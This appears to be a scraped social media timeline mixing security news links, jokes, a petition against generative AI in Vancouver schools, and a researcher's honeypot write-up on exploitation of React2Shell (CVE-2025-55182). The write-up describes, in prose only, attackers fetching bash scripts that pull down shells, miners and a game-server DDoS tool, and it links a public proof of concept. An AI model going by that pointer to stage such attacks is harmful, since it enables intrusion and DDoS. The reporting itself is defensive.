A new Android malware campaign is using the Hugging Face platform as a repository for thousands of variations of an APK payload that collects credentials for popular financial and payment services.

https://www.bleepingcomputer.com/news/security/hugging-face-abused-to-spread-thousands-of-android-malware-variants/

An AI Toy Exposed 50,000 Logs of Its Chats With Kids to Anyone With a Gmail Account
https://www.wired.com/story/an-ai-toy-exposed-50000-logs-of-its-chats-with-kids-to-anyone-with-a-gmail-account/?utm_source=flipboard&utm_medium=activitypub

Posted into Security News @security-news-WIRED

FINISHED IT. #AI #Tech #technology #embroidery #Handmade

@davidgerard Maybe he could just become a RAM vendor to every other industry, since he apparently felt the need to buy every single goddamn wafer in existence in advance, before it was even produced.

@harrymccracken Second nomination for Steve Wozniak, but also for whichever exec at Commodore convinced engineering to let their dog's footprint be on the interior of the upper case mold for the Amiga, with all the other exec's signatures. Absolute legend.

Launching their new social network, W, a group in the EU posted a map of where other social networks are hosted. It showed nothing in Europe.

But their map is wrong.

Here's what Mastodon actually looks like, and what the Fediverse as a whole actually looks like.

https://arewedecentralizedyet.online/map/?source=fedi

@thetnholler.bsky.social

I can't say it better than this:

"I have given this offer more consideration than it is due already. Now, fuck off. Then keep fucking off. Fuck off until you come up to a gate with a sign saying ‘You Can’t Fuck Off Past Here.’ Climb over the gate, dream the impossible dream, and keep fucking off forever."

Cory Doctorow (@pluralistic), Attack Surface (Little Brother, #3)

#Mozilla wants to know what you want from them and, in particular, #Firefox.

Let.

Them.

Know.

https://mozillafoundation.tfaforms.net/201

@north
Counterpoint:

ActivityPub binhex over morse code, transmitted on HF frequencies during solar storms for increased range

@PhineasX 伝説的 !

@atomicpoet Dang, and here I thought it was going to be a beer brewing sim!

Vancouver School Board are planning to deploy Microsoft Copilot in classrooms.

We are collecting signatures to show VSB that we are concerned about the effect on our children, and do not consent.

If you are concerned about AI being used in classrooms, please sign and share this petition.

https://actionnetwork.org/petitions/voice-ai-concerns-to-vancouver-school-board

#ai #copilot #vancouver #noai #microsoft

I just signed a petition put out by @noschoolai, run by parents whose children attend the Vancouver school district in Vancouver, BC, Canada.

Their school board, the VSB, has decided to deploy the Microsoft Copilot generative AI tool to the district. These parents oppose the use of Gen AI chatbots in schools, and have organized a petition drive to signal to the school board that the wider community does not agree with this deployment.

Here is what I wrote in my petition comment:

While neither a resident of the region or a parent of a student in this school, I am a tech policy expert and advisor on the use of generative AI in K-12 education.

I strongly discourage the VSB from deploying this technology until and unless they understand the educational purpose of the deployment, and have already passed and enacted appropriate districtwide policies governing the boundaries of how, when, and who are allowed to use it, and for what purpose, sought feedback from the wider community, and fully understand and have explained to the public what are the privacy, data security, and abuse/exploitation risks you are willing to tolerate in order to subject students and staff in the district to this technology.

If you cannot explain the fundamental educational purpose of this project, the limits you place on its use, and a risk model for what happens when use falls outside of these parameters, under no circumstances do you have any business deploying or using generative AI in any schools.

https://noai.school/vsb-petition/

#EdTech #SchoolBoard #TechPolicy

I'm having trouble with the UK #PostOffice customs form entry today. Whatever HS code I try to type in by number, it only ever offers this 8211 - which appears to be for table knives. I wanted circuit boards.

Well, here's a new accursed UI pattern. When you try to book a flight on Chase rewards and key in the exact code for the airport you want to go to, it suggests a bunch of non-matching airports, and puts the exact match like 10 options down.

@danielkennedy74 Are they "securi-splainers?"

@thedarktangent @adamshostack came here to say exactly this. Well played, Adam!😂

The UK government is to enforce a law this week which will make it a criminal offence to create non-consensual intimate images and make a new law to make tools to create non-consensual intimate images illegal https://www.bbc.co.uk/news/articles/cq845glnvl1o

I had a chance last week to chat with Benjamin Read of #Wiz. Last month, Read and other members of his team published a deep dive into the #React2Shell
(CVE-2025-55182) vulnerability, and I was curious to see what has been hitting my honeypot, so I took a closer look.

This is doing some weird stuff, friends.

As is normally the case with exploits targeting internet-facing devices, once the exploit becomes known, it ends up in the automated scanners used by threat actors and security researchers. What I've seen over the past week is a combination of both.

In just a few hours of operation, I identified a small number of source IP addresses exploiting React2Shell by pointing the vulnerable system at URLs hosting BASH scripts. These scripts are really familiar to anyone who routinely looks at honeypot data - they contain a series of commands that pull down and execute malicious payloads.

And as I've seen in the past, some of these payloads use racially inflammatory language in their malware. It's weird and gross, but unfortunately, really common.

But while most of these payloads were "the usual suspects" - remote shells, cryptocurrency miners - there was one payload that stuck out.

It's an exploit file, based on this proof-of-concept [https://github.com/iotwar/FIVEM-POC/blob/main/fivem-poc.py] designed to DDoS a modded server running "FiveM," a popular version of the game Grand Theft Auto V.

Let that one sink in: among the earliest adopters of a brand new exploit are...people trying to mess with other people's online game servers.

I've long said that exploits like these are the canaries in the datacenter coal mine. After all, if an attacker can force your server to run a cryptominer (or a game DDoS tool), they can force it to run far more malicious code.

I guess someone, or a group of someones, just want to ruin everyone's good time, no matter how or what form that takes. And they'll do it in the most offensive way possible.

Anyway, patch your servers, please, if only to stick it to these people who want to be the reason we can't have nice things.

#PoC #exploit #CVE_2025_55182 #DDoS #FiveM #REACT #Bash #cryptominer #malware

OFCOM have opened a formal investigation into X.

They may fine X 10% of its global revenue, require all advertisers to withdraw as an X client, and require UK internet providers to block X. https://www.ofcom.org.uk/online-safety/illegal-and-harmful-content/ofcom-launches-investigation-into-x-over-grok-sexualised-imagery